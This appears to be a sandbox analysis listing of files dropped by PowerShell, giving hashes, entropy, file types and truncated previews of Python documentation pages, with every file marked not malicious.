                              SHA-512:3F9D6FB473F25BFF73A9D7EF9C2B0C5DBFC0C5F6F808A6629023B5DDBD8F2B32988A3525D70947F52503BBFCE7A7390D69715940ECB501D76849809AEFED702E
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="unittest.mock . mock object library" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/unittest.mock.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/unittest/mock.py unittest.mock is a library for testing in Python. It allows you to replace parts of your system under test with mock objects and make assertions about how they hav..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/unittest/mock.py uni
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):16657
                              Entropy (8bit):4.853100510708217
                              Encrypted:false
                              SSDEEP:192:WiqJqGrtTKHqkX1vKQMLMgwnVTMbZSD1pDQMX6gnZTMboA76dqEC:GYrHqklevwnVTMo1PqgnZTM776dqEC
                              MD5:3BF2AC5B2D340EE3747A7992036FA746
                              SHA1:18C9914C9E8A3D6F40669DF664E155E6E747E965
                              SHA-256:6382EC1D388B6A0C6D61071373E4F36022BFBF6BB63026395E8B1D03960F2734
                              SHA-512:C6A00C190F28C0CA6B9C92992A3B6E21A46172DF7569A414F8B9F9863D37CB3B96F1F2FBDF4C0C74CE6CE5AD59277CF23ED61557A6DF7010F3F6F34FFD093FB0
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Unix Specific Services" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/unix.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The modules described in this chapter provide interfaces to features that are unique to the Unix operating system, or in some cases to some or many variants of it. Here.s an overview: posix . The m..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The modules described in this chapter provide interfaces
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (800), with CRLF line terminators
                              Category:dropped
                              Size (bytes):23367
                              Entropy (8bit):4.9001952395018105
                              Encrypted:false
                              SSDEEP:384:ZQhQbroHqklBrD9hrXnBTMobgkmoGg59TSa8TVeMU7Tsku2XeZOmrD4hrhnVTMD1:TQqyBPf7FMozmoGa9TSaIVeMU7T1u2X6
                              MD5:DD460A61B3C952243BDB5DC3BB3361AB
                              SHA1:5F3402E5AC5B47BD0354E75856599418E13DA05A
                              SHA-256:A562798202C670EF1981A4E18068BE1E164602EB07868AD33B6EDB748DF70E44
                              SHA-512:0D20A506018780799D47E40905F168FF1EA00E53BD20E90101CD871109CFDD7164FD92DE6CBE8285A7BC5FF815153CAC775445EA1EE538BA31BF4BD345F7D90E
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="urllib.error . Exception classes raised by urllib.request" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/urllib.error.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/urllib/error.py The urllib.error module defines the exception classes for exceptions raised by urllib.request. The base exception class is URLError. The following exceptions are ra..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (548), with CRLF line terminators
                              Category:dropped
                              Size (bytes):16082
                              Entropy (8bit):4.865099246634368
                              Encrypted:false
                              SSDEEP:384:B7EMHqklmcGBPneJTMCQHbIpx3cGcpne9TMT76dqEC:lqymxVIMF+xymMT764N
                              MD5:E9CC7CAFFBBCD704FF27DBFFD4090FAB
                              SHA1:88A2A766415E7C8AA28F9586FB28D7351F7187E8
                              SHA-256:040DDCEF87EDC7CFF2D7AD558FD4BF0230EB6A3E475AD49F6005FB6F1CFCF4E3
                              SHA-512:D281DDD2A51474118CB2F87B50ED3E8C62B2BABF8A414F297D45CDAF1B5713942C9B827E53F8889FE128DBB2363FC3A6E4861B09900511F3970B9E4455614D92
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="urllib . URL handling modules" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/urllib.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/urllib/ urllib is a package that collects several modules for working with URLs: urllib.request for opening and reading URLs, urllib.error containing the exceptions raised by urlli..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/urllib/ urllib is a package that
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1615), with CRLF line terminators
                              Category:dropped
                              Size (bytes):111324
                              Entropy (8bit):4.849332280825592
                              Encrypted:false
                              SSDEEP:1536:IqyvMOiP+EylcyT1mdYUXbMsyYVyYWyb4y3gyFIy86VjMsyYVyYWyb4y3gyFIy8X:GzGXZK1hXEg
                              MD5:1680B37963B738C4EE93E0FEFA2F06F0
                              SHA1:9B94577E029AC679763E350823A9EAE49E33F160
                              SHA-256:23615E6440552750DC5A4A06CE7047736A220B5FF40348B1F5E3BAB204CA824E
                              SHA-512:7F38398E2CD42A53F9ABBD5B2620C1AD76246ACD2B470C31146B085825AC028A51F72DFE4349659EB04356C312CF419BD06C604F1A144E147048C1E0745413CD
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="urllib.parse . Parse URLs into components" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/urllib.parse.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/urllib/parse.py This module defines a standard interface to break Uniform Resource Locator (URL) strings up in components (addressing scheme, network location, path etc.), to combi..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/urllib/parse.py
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1468), with CRLF line terminators
                              Category:dropped
                              Size (bytes):221888
                              Entropy (8bit):4.877880664619488
                              Encrypted:false
                              SSDEEP:1536:EqysMS3KTGRCsjcT4k4/LxVx53F87ka7U72iTjyFZyHzyFxyYiyFas/Ml0NvYllm:7rGOcNUbhMlmwtrymJljIqNuwX327bg
                              MD5:FACD4640E562DD1F701D544A527DF001
                              SHA1:524036E773CCE5AEB80EF0A31C5E85ED0BFEA694
                              SHA-256:26B0363BFC6B856D63DACD948EC06C32F0AE8F159D2057B47E052DF8D2647210
                              SHA-512:5FD0B6630414D8BAFBE3E78699F223BDF06E4AB39E4A0F2E33AD219D3F03ADDA0E81BB3A6A671BE98A9D106235CECB1AF3237B68BA16DD2A145283C6757BDF57
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="urllib.request . Extensible library for opening URLs" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/urllib.request.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/urllib/request.py The urllib.request module defines functions and classes which help in opening URLs (mostly HTTP) in a complex world . basic and digest authentication, redirection..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (610), with CRLF line terminators
                              Category:dropped
                              Size (bytes):26104
                              Entropy (8bit):4.876505397503317
                              Encrypted:false
                              SSDEEP:768:5azqyd0LMC/r26TylMTXcpFOuCi5OsOanTlPPMHY764N:yqyIMg26TylMTXcpFOuCi5OsOanTZM41
                              MD5:AD066422A2476B17126795A45C6E7B4F
                              SHA1:A0D73833D1580704AE0E8E89D0A72F97D79A2718
                              SHA-256:03BDE5BAF13AAA8D1172EC06F5503088388D03E9F7912EC523E664DC1A5BBF5A
                              SHA-512:AC89D3EB14E053245E595EFE438A8CA4333AD2063190397B081040A6B7B7C2CFBBF42DA7F7260608D84D9684D7F63FFBB3354D8EB9BB62835E4502AC7CF06306
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="urllib.robotparser . Parser for robots.txt" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/urllib.robotparser.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/urllib/robotparser.py This module provides a single class, RobotFileParser, which answers questions about whether or not a particular user agent can fetch a URL on the web site tha..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/urllib/
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1123), with CRLF line terminators
                              Category:dropped
                              Size (bytes):21552
                              Entropy (8bit):4.867093628143615
                              Encrypted:false
                              SSDEEP:384:1MFmUHqklHnFnZTMMoab9+RhpsosyFMyFw5yYWRVsoyFMyFHyYr1fyLnNTMlg76g:kqyHFNMKE7psosyFMyFw5yYIVsoyFMy+
                              MD5:A2FC2CE3BBD0DF9DA04D1D2DFFAC68B2
                              SHA1:09C0EC1D3E0C003345C2DE1D702FD15E7B139928
                              SHA-256:50C40FBE4208291CD6BA74373C7441714BB268DB246116873C3925D2BDA5AE47
                              SHA-512:22172708165462E7D8E9E2A6B262F412DE860282A7F504F9DDAA5EED3D2424E1B80292BC80B91A947D11A4CCD5CD0E3C8C51AE9844DF501DA58570B8CFDB2B7F
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="uu . Encode and decode uuencode files" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/uu.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/uu.py This module encodes and decodes files in uuencode format, allowing arbitrary binary data to be transferred over ASCII-only connections. Wherever a file argument is expected, ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/uu.py This module encodes and
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1828), with CRLF line terminators
                              Category:dropped
                              Size (bytes):56407
                              Entropy (8bit):5.0278988399964835
                              Encrypted:false
                              SSDEEP:1536:PqySMU00143O6Q3yFkyFoyFSyFeyFfyFw3yhctUHYLiUXV3nFapDcW/02KBkuVOT:xTg
                              MD5:B3E6E2C3318689E5F5D062D78F005A30
                              SHA1:E9BEFC0EACC6F3F4520F19FFC6BA12534BEE4DF3
                              SHA-256:FB827DA8A88E09D5C9E50ECD15F738E5BF11F01110C89CC706FC092FAB53322C
                              SHA-512:609DBEAB39FEE377355D5B84F9EFE75DB81A64C958EE15DC1EE56994722AE1DD790806488BC713A107E2652C952E5CB075154E5A71DA241491492216C5554A30
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="uuid . UUID objects according to RFC 4122" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/uuid.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/uuid.py This module provides immutable UUID objects (the UUID class) and the functions uuid1(), uuid3(), uuid4(), uuid5() for generating version 1, 3, 4, and 5 UUIDs as specified i..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/uuid.py This module pro
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1783), with CRLF line terminators
                              Category:dropped
                              Size (bytes):96961
                              Entropy (8bit):4.748490424622566
                              Encrypted:false
                              SSDEEP:1536:5qyZMWBFVeem/uYxfyYOyYLyYLyYxyYxyFIyYGy9YzQyI9b+5Y+5SV515L5E5kI5:fu/uqWg
                              MD5:A923EFE9930B2C96A6147EEBCBD38ED9
                              SHA1:0D94764258FAD7D8A8FF825EBF1063AE52C5E69C
                              SHA-256:E7AAFA714A9ED1CE8C0D5D3770A7CAF733F34A6A31D44D95BE19FB509BABF9E9
                              SHA-512:27712E65A0A6E59A1BFBB6EC71029D84DCFB4EE145F4F60F9752EDF7BB87D8ABDB0B0F081577F6F0C1E2FBD800FA037551BE7BA4C9EEA57B222FB49A42479A6A
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="venv . Creation of virtual environments" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/venv.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/venv/ The venv module supports creating lightweight .virtual environments., each with their own independent set of Python packages installed in their site directories. A virtual en..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/venv/ The venv module
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1446), with CRLF line terminators
                              Category:dropped
                              Size (bytes):78597
                              Entropy (8bit):4.797620516183057
                              Encrypted:false
                              SSDEEP:1536:mqy+MCkM9EGiukPJDeNRzpryFByQCyFw8yFH0daprCyPyFcyFkyFCyFnEprCylyp:pMIJAqg
                              MD5:92DDAEEC3ABDB8537ACBB360D1805C1A
                              SHA1:45FDE1368D1CD84812AE22DC81CCC0A26526DF89
                              SHA-256:68C6314DA576BAA8A45BF099D79AF7B16EF1973DDA979DAF4EC7A3EBE8BDBC03
                              SHA-512:F65DDEF305B61B9EED21F6F01BCDC2B3E9D0F85F0DD6735F5CB394F3290FF5B764D27BA56EFB9A75E8641849412C5BFC526579CF6F520FD417E934B1FA1C093B
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="warnings . Warning control" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/warnings.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/warnings.py Warning messages are typically issued in situations where it is useful to alert the user of some condition in a program, where that condition (normally) doesn.t warrant..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/warnings.py Warning messages are
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (564), with CRLF line terminators
                              Category:dropped
                              Size (bytes):39451
                              Entropy (8bit):4.887550524319566
                              Encrypted:false
                              SSDEEP:768:Hqy9z5Mf1LaMyFs8w1MZ3e8wPtAWkQAGYFboi7W5TQAPQCrQWQw8sd49KkTBkh0o:HqyHMf1LaMyFsh1MZ3e8wPtAWkQAGYFc
                              MD5:F46430640AD777A439212FE4A3B34B56
                              SHA1:AFF304AA985DDF8429D98FA735DAD80F2AEE2F2D
                              SHA-256:B9EC202990B0C1F4DF768F15ADFFF7F7C3E96BDE26BD2F417B55DEBC8C5B94BC
                              SHA-512:935C2828131409D509D4002A6A63BB1DC7A255F3617B3932DB2813637DD40B79A591306A8F90EE043A13D17FC3ED6334A42B0F259F6544538E73EFD0A2E0DDC0
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="wave . Read and write WAV files" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/wave.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/wave.py The wave module provides a convenient interface to the Waveform Audio .WAVE. (or .WAV.) file format. Only uncompressed PCM encoded wave files are supported. The wave module..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/wave.py The wave module p
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (885), with CRLF line terminators
                              Category:dropped
                              Size (bytes):79471
                              Entropy (8bit):4.81712097055603
                              Encrypted:false
                              SSDEEP:1536:Uqy8Mjqk2FLFepge/nnXjU//npVw3/6l/PcJvdeOUsqQGJM4vDToS5iVncb53F/Z:/VLFUGVBOUEE9qDSMg
                              MD5:273C882B5B8E6CBA1897D13752A82DAA
                              SHA1:F8B0FA2ECA1E90EF260B9D16D7C18929D1981AA4
                              SHA-256:327F573C35B9998C2A8D3325FA10968F17B1D7280F64F57E5763DA04748F2C7C
                              SHA-512:394BB45B9B7843F97319F72927433DFC29EE1DCB9B77E6079D7E84555527D06A0583345AA41406B3EEC37AF1ABA7753009ED5126E93ADB8FDB7F09C2912E6020
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="weakref . Weak references" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/weakref.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/weakref.py The weakref module allows the Python programmer to create weak references to objects. In the following, the term referent means the object which is referred to by a weak..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/weakref.py The weakref module allows
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (954), with CRLF line terminators
                              Category:dropped
                              Size (bytes):38336
                              Entropy (8bit):4.883402014603931
                              Encrypted:false
                              SSDEEP:768:A7uqy/+INMiFiAx6U1pLTNyLuyTIiTfCTTv2yFEObbAyFwuyYmmoEzyRAc/LTNyJ:A7uqytMiNYU1pLTNyLuyTIiTfCTTv2y/
                              MD5:ABB39CD64704D762FFA6B30F59DD06C4
                              SHA1:47F769E89383F6E3AF4FA3446CD509FB2EF7BEDF
                              SHA-256:1F6110281EC11819B923B9FDE0A234786F8B7B2D9E56826371D8A7F870AF358F
                              SHA-512:B29A253EBEC4D8517D56CBE06C1FED11CA167FD80EFB39D7B331746346BDF5A6263DD5F38BF3CAD24AE887A856E2AE783CC759D50CDAB266699339E25EECC1FB
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="webbrowser . Convenient web-browser controller" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/webbrowser.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/webbrowser.py The webbrowser module provides a high-level interface to allow displaying web-based documents to users. Under most circumstances, simply calling the open() function f..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/webbrowser.p
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):15487
                              Entropy (8bit):4.871987666436683
                              Encrypted:false
                              SSDEEP:192:Wurti4KHqkX1vQMuMg9nZ9TMbC//8cNM06TnZhTMbLA76dqEC:gBHqkllG9nZ9TMFnTTnZhTMI76dqEC
                              MD5:AEE550B4E89D47C5F337353C343A646B
                              SHA1:DAE252B7A2B752B5CAE3029CA49BD641DD1334FC
                              SHA-256:C54CAD47AD211BAC61BBBA8807DDC391DFCF4653536A6E630580C3E74B4F175B
                              SHA-512:396E56B9A315D6F9F26CB720CD585421DC86DE4757BE2F4A3F17E4D35D3B339460EFFDA4398128FBDE2E1544A4C15F3C2938FF5223DC43D4785404CE1F3D988E
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="MS Windows Specific Services" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/windows.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This chapter describes modules that are only available on MS Windows platforms. msvcrt . Useful routines from the MS VC++ runtime- File Operations, Console I/O, Other Functions., winreg . Windows r..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This chapter describes modules that are only ava
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (873), with CRLF line terminators
                              Category:dropped
                              Size (bytes):94874
                              Entropy (8bit):4.966208973456304
                              Encrypted:false
                              SSDEEP:1536:qqyl7MjYzA6TMqg5lnx5l/yLlycBF5lqg05llyg/yLVij5O6r5HMB5HOPyNqpG5s:YQ4WiNCCaqg
                              MD5:2D6596A56268E491DE4F0BD3190464F9
                              SHA1:3BACE70E70E6E49472538D409201E698ECC73DE6
                              SHA-256:20E957E2C50EBDEB0ED1C456B755F5DD2DA4AF5BB151B99EB5FEE04AD5D85B31
                              SHA-512:287DECB10ED4A17B116149ACC4ED780E7440C3E7B8AAC11F27E16D0D00F8ED57DB9100A5F863E8FA688B1A774A9366781F345C9A34AC10E536775FEC4AE7BD54
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="winreg . Windows registry access" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/winreg.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="These functions expose the Windows registry API to Python. Instead of using an integer as the registry handle, a handle object is used to ensure that the handles are closed correctly, even if the p..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="These functions expose the Windows registry API
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (506), with CRLF line terminators
                              Category:dropped
                              Size (bytes):29702
                              Entropy (8bit):4.985365649263579
                              Encrypted:false
                              SSDEEP:768:px2nqylp4Mdh7AvAGpgyLk8yN5Sovk0AYRkkA0MYn3lj8kuNBSl9ib/qWBsqWM51:pxyqy4Mdh7AvAGpgyLk8yN5SovhxRkkQ
                              MD5:D5C3239381960CFA14CF454360EBAD0D
                              SHA1:08EC44782B488401C7E3480E3AA92536E8401A83
                              SHA-256:6C78A6395FBDBC46EF7D864744131D36FAAD9260E48D4E86CA7CB1D426675C4B
                              SHA-512:165B39FF540BB395F8750F0C5999D7DA2BD4446B0BD39DAB0593C3C9C35E5759A6AB5F09C3ABABA53C70721C1A1548338B873EDE19F7D5534617C18B20F234F7
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="winsound . Sound-playing interface for Windows" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/winsound.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The winsound module provides access to the basic sound-playing machinery provided by Windows platforms. It includes functions and several constants." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The winsound module provides access to the basic sound-playing machinery provided b
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1004), with CRLF line terminators
                              Category:dropped
                              Size (bytes):126181
                              Entropy (8bit):4.87775572417589
                              Encrypted:false
                              SSDEEP:1536:frqyM56M9O56HO7HQyT9IHPYHzBmHp0GHbaKlVyXvfdqJ7sbd8bOojO/DRccGTO7:Wo15xfBHRFhvCTOrwZ/bg
                              MD5:861B0818593C73384EBC77DCF88965AD
                              SHA1:50B969107E69F6AD44024AD4294DFA125AF57875
                              SHA-256:D71BEBDB3D624D74342127327FF0F7A36EE96B36D180765DF96C6C599ADE6EFA
                              SHA-512:298C232FC3914D3682FEC92B1D26BB371B4FF8CD5F9BAFB54C9FB5D41773FD120CBCC7DC591427E282DCD57726FFFE15DE63D9744106DC0F081CAB38CE301B4A
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="wsgiref . WSGI Utilities and Reference Implementation" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/wsgiref.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/wsgiref The Web Server Gateway Interface (WSGI) is a standard interface between web server software and web applications written in Python. Having a standard interface makes it eas..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/wsgiref
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (560), with CRLF line terminators
                              Category:dropped
                              Size (bytes):46119
                              Entropy (8bit):4.877599312930158
                              Encrypted:false
                              SSDEEP:768:9qyoUQMOYZu5B+k07hSsXIh+fPekPzSQmfSQQj5wX7qkOyJt1A2UkKQm2mEA2qI2:9qyCMOx5B+k5sXIh+fPekPzSQmfSQQjx
                              MD5:A359D4348582E1DEF4C813B232419D2E
                              SHA1:80A4423B5481CA0A5E1E3A871C6E5AD98C0500E0
                              SHA-256:4D5E0DCE266FB4A940E13C661B1F511CE7AE9AA276339ACDB72ECA74F20BF97F
                              SHA-512:DC70CF3F1270046F778AF9837D62564EFC1D5212CA99F4956E6A20F7006E89BF71002E214828D7DD432FF77A01ADD73FABF56E0D6A25B0245C18555B8FCA6846
                              Malicious:false
